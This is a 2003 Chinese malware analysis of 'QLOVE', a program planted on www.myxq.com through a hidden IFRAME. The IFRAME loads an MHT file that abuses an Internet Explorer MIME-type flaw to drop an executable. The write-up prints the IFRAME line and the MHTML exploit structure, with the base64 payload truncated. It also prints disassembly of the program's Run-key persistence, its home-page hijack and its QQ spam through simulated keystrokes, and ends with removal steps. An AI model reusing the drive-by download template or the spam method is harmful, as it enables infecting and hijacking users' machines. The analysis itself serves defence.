网遇QLOVE日记创建时间:2003-05-24 文章属性:原创 文章来源:http://superlinux.yeah.net 文章提交:linuxh4cker (linuxh4cker_at_yahoo.com.cn) 网遇QLOVE日记 Author : linuxh4cker Email : linuxh4cker@yahoo.com.cn HomePage: http://superlinux.yeah.net 某日上网,正在查看QQ上好友的信息,突然发觉QQ自动发了一个信息出去,我大吃一惊,难道是大名鼎鼎的" 中国黑客"出新版本了?不过不可能啊,“中国黑客”偶认为是一个标准的概念病毒,因为它没有打开破坏的 功能接口,仅仅是展示了其创新的想法,何况中国黑客的QQ功能仅仅是向发送窗口输入爱国口号,没有发送 的功能。一些疑虑顿上心头。 经过发现,发现www.myxq.com这个网站出的问题最大,打开一看,又吓了一跳,然后是各种XXX灰飞烟灭,果 然你的问题最大。还是先改该IE的设置吧,将所有的AXTIVE,脚本,等你觉得不顺眼的都关闭,再打开页面 ,然后看看原代码,还不到1秒钟,IFRAME就向我招手了,我看到既兴奋有害怕。在IFRAME包含的.mnt的到底 是什么东西啊,还得看个究竟。 该站网页内含有 <IFRAME src="http://ads.ourcode.net/qweb/MYXQWebAuto.mht" width=0 height=0></IFRAME> 而默认的IE安全级别是自动运行的。 这样就被下载到用户的机器中,而分析这个MHT后缀的MHTML Document网页文档到底是什么呢,一看才 知道原来是利用了错误的MIME头漏洞,偶的机器什么补丁也没打,最佳的蜜陷,自己就是IDS,对了,就这样 轻松的让她进来了。 还是看看她的庐山真面目吧: ------------------------snap---------------------------------- Content-Type: multipart/related; type="multipart/alternative"; boundary="====B====" --====B==== Content-Type: multipart/alternative; boundary="====A====" --====A==== Content-Type: text/html; Content-Transfer-Encoding: quoted-printable <iframe src=3Dcid:Mud height=3D0 width=3D0> </iframe> --====A====-- --====B==== Content-Type: audio/x-wav; name="qlove.exe" Content-Transfer-Encoding: base64 Content-ID: <Mud> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 。。。省略 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA== --====B==== ----------------snap--------------------------------- 果真没错,那么熟悉。那么我的机器里面应该有可爱的qlove.exe这个文件了吧,搜索一下,找到了哈,看看 大小,恩,应该是汇编写的吧,不放心,拿FI.exe照妖镜一看,啊,原来是VC啊,太没有创意了吧,这年头 ,还有人用VC来写这种东西,再次嘛,也要用什么delphi啊,是吧? 也好,至少不是用汇编写的,那样也就少了什么花指令,什么迷惑我的东西,VC写的,呵呵,VC写的,任何 反汇编都能吃了你。于是操起已经尘封多月的W32Dasm,什么你说太老土,大家都用ida了?我晕,其实偶用 的动态调试工具中没有SOFTICE,也没有TRW2000 ,最爱用的是TRV2.52,哈够老土了吧。 言归正传,还是应该反反看,到底是些什么功能。 于是又牺牲了我1个小时的PK时间,来做这个地球人都不愿意做的事情。经过分析,发现这个未请自来的程序 ,不好叫别人病毒吧,别人又不是生下来就在身上写了病毒两个大字,一下批倒了,还是给别人改过自新的 机会吧,叫QLOVE它本名字吧。 虽然他在我眼里不是病毒,不过他的手段基本和病毒差不多,仍然有感染部分,传播部分,和自身的保护部 分,下面先给出反汇编的主要功能模块。 运行后会自动更改WIN.INI,并将自身以WebAuto的名字拷贝到系统目录下,改动那个地球人都知道的注册表 地方,让系统启动后自动运行。并且通过注册表的改动,让IE的默认页面自动为www.myxq.com。同时由下面 的汇编代码也就清楚了初始的疑惑,为什么QQ会自动的发消息,还是利用了USER32.DLL中的keybd_event这个 API函数,当然还得感谢QQ的快捷键,成就了她通过自动发QQ广告宣传她的站点作用,一旦,你看到这个广告 ,主页上的代码就运行到你的机器上了,然后就是继续的为其服务,宣传广告,即使你打了补丁,你的好友 老是给你发这个消息,你烦不烦啊。 反汇编分析部分 运行部分 * Possible StringData Ref from Data Obj ->"WebAuto" | :00401081 6820304000 push 00403020 :00401086 6A01 push 00000001 :00401088 57 push edi :00401089 FF1518204000 Call dword ptr [00402018] ;建立互斥体"WebAuto" :0040108F 85C0 test eax, eax ;判断内存是否已经运行了 :00401091 746C je 004010FF ;若有则跳到结束 * Reference To: KERNEL32.GetLastError, Ord:011Ah | :00401093 FF1510204000 Call dword ptr [00402010] ;获得错误信息 :00401099 3DB7000000 cmp eax, 000000B7 ;错误则跳到结束 :0040109E 745F je 004010FF * Reference To: KERNEL32.Sleep, Ord:0296h | :004010A0 8B3514204000 mov esi, dword ptr [00402014] * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:004010FD(U) | :004010A6 A14C324000 mov eax, dword ptr [0040324C] :004010AB 40 inc eax :004010AC 83F828 cmp eax, 00000028 :004010AF A34C324000 mov dword ptr [0040324C], eax :004010B4 7E0B jle 004010C1 ;跳到运行 :004010B6 893D4C324000 mov dword ptr [0040324C], edi :004010BC E89F050000 call 00401660 ;休眠 * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:004010B4(C) | :004010C1 E8DA000000 call 004011A0 :004010FF 5F pop edi ;恢复堆栈寄存器 :00401100 5E pop esi :00401101 B801000000 mov eax, 00000001 :00401106 5B pop ebx :00401107 C21000 ret 0010 ;返回 感染部分 将拷贝到系统目录并修改WIN.INI和注册表中 * Reference To: KERNEL32.GetSystemDirectoryA, Ord:0159h | :004011D0 FF151C204000 Call dword ptr [0040201C] ;得到系统目录 :004011D6 B940000000 mov ecx, 00000040 :004011DB 33C0 xor eax, eax :004011DD 8D7C2410 lea edi, dword ptr [esp+10] * Possible StringData Ref from Data Obj ->"WebAuto.exe" | :004011E1 6880304000 push 00403080 :004011E6 F3 repz :004011E7 AB stosd :004011E8 8D842414010000 lea eax, dword ptr [esp+00000114] :004011EF 8D4C2414 lea ecx, dword ptr [esp+14] :004011F3 50 push eax * Possible StringData Ref from Data Obj ->"%s\%s" | :004011F4 6878304000 push 00403078 :004011F9 51 push ecx * Reference To: MSVCRT.sprintf, Ord:02B2h | :004011FA FF15CC204000 Call dword ptr [004020CC] :00401200 83C410 add esp, 00000010 :00401203 8D542410 lea edx, dword ptr [esp+10] :00401207 8D842410020000 lea eax, dword ptr [esp+00000210] :0040120E 6A00 push 00000000 :00401210 52 push edx :00401211 50 push eax * Reference To: KERNEL32.CopyFileA, Ord:0028h | :00401212 FF1520204000 Call dword ptr [00402020] ;拷贝文件qlove到系统目录 ;并改名WebAuto.exe ;修改注册表,使得程序随WINDOWS启动,自动运行WebAuto.exe。 ;并修改IE默认的启动页面为http://www.myxq.com * Reference To: ADVAPI32.RegOpenKeyA, Ord:0171h | :00401218 8B1D04204000 mov ebx, dword ptr [00402004] :0040121E 8D4C240C lea ecx, dword ptr [esp+0C] :00401222 51 push ecx * Possible StringData Ref from Data Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | :00401223 6848304000 push 00403048 :00401228 6802000080 push 80000002 :0040122D FFD3 call ebx ;打开RUN键下内容WebAuto.exe :0040122F 85C0 test eax, eax :00401231 740C je 0040123F ;如果不存在该键,跳到0040123F :00401233 5F pop edi :00401234 5E pop esi :00401235 33C0 xor eax, eax :00401237 5B pop ebx :00401238 81C404030000 add esp, 00000304 :0040123E C3 ret :0040123F 8B44240C mov eax, dword ptr [esp+0C] * Reference To: ADVAPI32.RegSetValueExA, Ord:0186h | :00401243 8B3500204000 mov esi, dword ptr [00402000] :00401249 8D542410 lea edx, dword ptr [esp+10] :0040124D 6800010000 push 00000100 :00401252 52 push edx :00401253 6A01 push 00000001 :00401255 6A00 push 00000000 * Possible StringData Ref from Data Obj ->"WebAuto.exe" | :00401257 6880304000 push 00403080 :0040125C 50 push eax :0040125D FFD6 call esi ;设置键WebAuto.exe :0040125F 8B4C240C mov ecx, dword ptr [esp+0C] * Reference To: ADVAPI32.RegCloseKey, Ord:015Bh | :00401263 8B3D08204000 mov edi, dword ptr [00402008] :00401269 51 push ecx :0040126A FFD7 call edi ;关闭该键 :0040126C 8D54240C lea edx, dword ptr [esp+0C] :00401270 52 push edx * Possible StringData Ref from Data Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | :00401271 6848304000 push 00403048 :00401276 6801000080 push 80000001 :0040127B FFD3 call ebx ;重新打开该键 :0040127D 85C0 test eax, eax :0040127F 740C je 0040128D ;存在,则跳到0040128D :00401281 5F pop edi :00401282 5E pop esi :00401283 33C0 xor eax, eax :00401285 5B pop ebx :00401286 81C404030000 add esp, 00000304 :0040128C C3 ret * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040127F(C) | :0040128D 8B4C240C mov ecx, dword ptr [esp+0C] :00401291 8D442410 lea eax, dword ptr [esp+10] :00401295 6800010000 push 00000100 :0040129A 50 push eax :0040129B 6A01 push 00000001 :0040129D 6A00 push 00000000 * Possible StringData Ref from Data Obj ->"WebAuto.exe" | :0040129F 6880304000 push 00403080 :004012A4 51 push ecx :004012A5 FFD6 call esi ;设置键值WebAto.exe :004012A7 8B54240C mov edx, dword ptr [esp+0C] :004012AB 52 push edx :004012AC FFD7 call edi ;关闭该键 :004012AE 5F pop edi :004012AF 5E pop esi :004012B0 B801000000 mov eax, 00000001 :004012B5 5B pop ebx :004012B6 81C404030000 add esp, 00000304 :004012BC C3 ret :004013A5 8D4C2408 lea ecx, dword ptr [esp+08] :004013A9 51 push ecx * Possible StringData Ref from Data Obj ->"Software\Microsoft\Internet Explorer\Main" | :004013AA 6898304000 push 00403098 :004013AF 6801000080 push 80000001 * Reference To: ADVAPI32.RegOpenKeyA, Ord:0171h | :004013B4 FF1504204000 Call dword ptr [00402004] ;打开Software\Microsoft\Internet ;Explorer\Main :004013BA 5F pop edi :004013BB 5E pop esi :004013BC 85C0 test eax, eax :004013BE 742E je 004013EE ;如果不存在,跳到4013EE. * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:004013BE(C) | :004013EE 8B442400 mov eax, dword ptr [esp] :004013F2 8D542404 lea edx, dword ptr [esp+04] :004013F6 6800010000 push 00000100 :004013FB 52 push edx :004013FC 6A01 push 00000001 :004013FE 6A00 push 00000000 * Possible StringData Ref from Data Obj ->"Start Page" | :00401400 688C304000 push 0040308C :00401405 50 push eax * Reference To: ADVAPI32.RegSetValueExA, Ord:0186h | :00401406 FF1500204000 Call dword ptr [00402000] ;设置默认启动IE页Start Page :0040140C 8B4C2400 mov ecx, dword ptr [esp] ;键值为www.myxq.com :00401410 51 push ecx * Reference To: ADVAPI32.RegCloseKey, Ord:015Bh | :00401411 FF1508204000 Call dword ptr [00402008] ;关闭键值 ;以下为更改WIN.ini部分 ;运行EXEAuto.exe * Possible StringData Ref from Data Obj ->"CurTime" | :00401691 6810324000 push 00403210 * Possible StringData Ref from Data Obj ->"AutoTime" | :00401696 6804324000 push 00403204 :0040169B 894DD8 mov dword ptr [ebp-28], ecx * Reference To: KERNEL32.GetProfileIntA, Ord:0147h | :0040169E FF1528204000 Call dword ptr [00402028];取得win.ini初 ;始化文件中指定条目的一个整数值 :00401717 8D95B4FDFFFF lea edx, dword ptr [ebp+FFFFFDB4] :0040171D 6800010000 push 00000100 :00401722 52 push edx * Reference To: KERNEL32.GetSystemDirectoryA, Ord:0159h | :00401723 FF151C204000 Call dword ptr [0040201C] ;获得系统目录 :00401729 B940000000 mov ecx, 00000040 :0040172E 33C0 xor eax, eax :00401730 8DBDB4FEFFFF lea edi, dword ptr [ebp+FFFFFEB4] * Possible StringData Ref from Data Obj ->"EXEAuto.exe" | :00401736 68C0314000 push 004031C0 :0040173B F3 repz :0040173C AB stosd :0040173D 8D85B4FDFFFF lea eax, dword ptr [ebp+FFFFFDB4] :00401743 8D8DB4FEFFFF lea ecx, dword ptr [ebp+FFFFFEB4] :00401749 50 push eax * Possible StringData Ref from Data Obj ->"%s\%s" | :0040174A 6878304000 push 00403078 :0040174F 51 push ecx * Reference To: MSVCRT.sprintf, Ord:02B2h | :00401750 FF15CC204000 Call dword ptr [004020CC] * Possible StringData Ref from Data Obj ->"CurTime" | :004018D6 6810324000 push 00403210 * Possible StringData Ref from Data Obj ->"AutoTime" | :004018DB 6804324000 push 00403204 * Reference To: KERNEL32.WriteProfileStringA, Ord:02EDh | :004018E0 FF1524204000 Call dword ptr [00402024] ;在Win.ini初始化 ;文件指定小节内设置一个字串 :004018E6 6A00 push 00000000 :004018E8 6A00 push 00000000 :004018EA 8D85B4FEFFFF lea eax, dword ptr [ebp+FFFFFEB4] :004018F0 6A00 push 00000000 :004018F2 50 push eax ;通过关联程序运行 :004018F3 6A00 push 00000000 :004018F5 6A00 push 00000000 * Reference To: SHELL32.ShellExecuteA, Ord:0072h | :004018F7 FF15E4204000 Call dword ptr [004020E4] ;执行关联程序 传播部分 通过QQ的发送消息,达到宣传 :00401052 33FF xor edi, edi :00401054 C7055032400060EA0000 mov dword ptr [00403250], 0000EA60 :0040105E 8B442410 mov eax, dword ptr [esp+10] :00401062 57 push edi :00401063 893D4C324000 mov dword ptr [0040324C], edi :00401069 893D48324000 mov dword ptr [00403248], edi :0040106F A340324000 mov dword ptr [00403240], eax * Reference To: USER32.GetActiveWindow, Ord:00DDh ;获得活动窗口的句柄 | :00401074 FF15F4204000 Call dword ptr [004020F4] :0040107A 50 push eax * Reference To: USER32.ShowWindow, Ord:026Ah ;控制窗口的可见性 | :0040107B FF15F8204000 Call dword ptr [004020F8] :00401468 53 push ebx * Reference To: USER32.FindWindowExA, Ord:00D6h | :00401469 8B1DFC204000 mov ebx, dword ptr [004020FC] :0040146F 56 push esi :00401470 57 push edi * Possible StringData Ref from Data Obj ->"发送消息" | :00401471 6880314000 push 00403180 :00401476 6A00 push 00000000 :00401478 6A00 push 00000000 :0040147A 6A00 push 00000000 :0040147C FFD3 call ebx ;查找QQ的“发送消息”窗口句柄 :0040147E 8BF0 mov esi, eax :00401480 85F6 test esi, esi :00401482 751C jne 004014A0 ;找到则跳转到004014A0 :00401484 C70550324000F4010000 mov dword ptr [00403250], 000001F4 :0040148E 8B4C2420 mov ecx, dword ptr [esp+20] :00401492 64890D00000000 mov dword ptr fs:[00000000], ecx :00401499 5F pop edi :0040149A 5E pop esi :0040149B 5B pop ebx :0040149C 83C420 add esp, 00000020 :0040149F C3 ret * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401482(C) | :004014A0 6A00 push 00000000 * Possible StringData Ref from Data Obj ->"RICHEDIT" | :004014A2 6874314000 push 00403174 :004014A7 6A00 push 00000000 :004014A9 56 push esi :004014AA FFD3 call ebx ;查找QQ的编辑RICHEDIT类窗口句柄 :004014AC 8BF8 mov edi, eax :004014AE 85FF test edi, edi :004014B0 7512 jne 004014C4 ;找到,跳004014C4 :004014B2 8B4C2420 mov ecx, dword ptr [esp+20] :004014B6 64890D00000000 mov dword ptr fs:[00000000], ecx :004014BD 5F pop edi :004014BE 5E pop esi :004014BF 5B pop ebx :004014C0 83C420 add esp, 00000020 :004014C3 C3 ret * Possible StringData Ref from Data Obj ->"送讯息(&S)" | :004014C4 6868314000 push 00403168 * Possible StringData Ref from Data Obj ->"BUTTON" | :004014C9 6860314000 push 00403160 :004014CE 6A00 push 00000000 :004014D0 56 push esi :004014D1 FFD3 call ebx ;查找QQ的送讯息按钮的句柄 :004014D3 85C0 test eax, eax :004014D5 7512 jne 004014E9 :004014D7 8B4C2420 mov ecx, dword ptr [esp+20] :004014DB 64890D00000000 mov dword ptr fs:[00000000], ecx :004014E2 5F pop edi :004014E3 5E pop esi :004014E4 5B pop ebx :004014E5 83C420 add esp, 00000020 :004014E8 C3 ret * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:004014D5(C) | :004014E9 8D4C2410 lea ecx, dword ptr [esp+10] :004015C1 50 push eax ; lParam :004015C2 6A00 push 00000000 ; wParam :004015C4 6A0C push 0000000C ; 消息的标识符 :004015C6 57 push edi ; 要接收消息的那个窗口的句柄 * Reference To: USER32.SendMessageA, Ord:0214h | :004015C7 FF15F0204000 Call dword ptr [004020F0] ;发送消息 :004015CD 56 push esi * Reference To: USER32.SetForegroundWindow, Ord:0230h | :004015CE FF15EC204000 Call dword ptr [004020EC] ;将窗口设为系统的前台窗口 * Reference To: USER32.keybd_event, Ord:02AAh | :004015D4 8B3500214000 mov esi, dword ptr [00402100] :004015DA 6A00 push 00000000 ;dwExtraInfo :004015DC 6A01 push 00000001 ;dwFlags,1代表扩展键 :004015DE 6A45 push 00000045 ;bScan 键的OEM扫描码 :004015E0 6A11 push 00000011 ;bVk 虚拟键码,模拟CONTROL键 :004015E2 FFD6 call esi ;模拟了键盘行动 :004015E4 6A00 push 00000000 :004015E6 6A01 push 00000001 :004015E8 6A45 push 00000045 :004015EA 6A0D push 0000000D ;RETURN回车键盘 :004015EC FFD6 call esi ;模拟了键盘行动 :004015EE 6A00 push 00000000 :004015F0 6A03 push 00000003 :004015F2 6A45 push 00000045 :004015F4 6A11 push 00000011 ;模拟CONTROL键 :004015F6 FFD6 call esi ;模拟了键盘行动 :004015F8 6A00 push 00000000 :004015FA 6A03 push 00000003 :004015FC 6A45 push 00000045 :004015FE 6A0D push 0000000D ;RETURN回车键盘 :00401600 FFD6 call esi ;模拟了键盘行动 ;上面这一系列的键盘模拟无非是QQ的发送快 捷键(ctrl+回车) 到了这里了也应该知道如何防范了吧。该打补丁的就打补丁,不幸感染了的就删除你注册表中多余的垃圾吧 ,同时象偶这样不喜欢打补丁的人,就打开IE,选择工具->INTERNET选项->安全->自定义级别-》在IFRAME中 加载程序和文件->选择禁用,就可以了。 删除垃圾: 删除MYXQWebAuto.mht,qlove.exe和系统目录下的WebAuto.exe程序 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中清除WebAuto.exe键 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run中清除WebAuto.exe键 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main中清除Start Page的键值 HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main中清除Start Page的键值 注意需要先将WebAuto.exe程序杀掉,直接在任务栏就可以杀掉,这也是我说这个算不上病毒的原因, 因为作者没有注册为服务,隐藏进程,也没有象“中国黑客”那样3线程保护,不过不知道这个程序会不会 我这样一说以后升级,增加了这些功能,哈,就不是我的事情了。 |
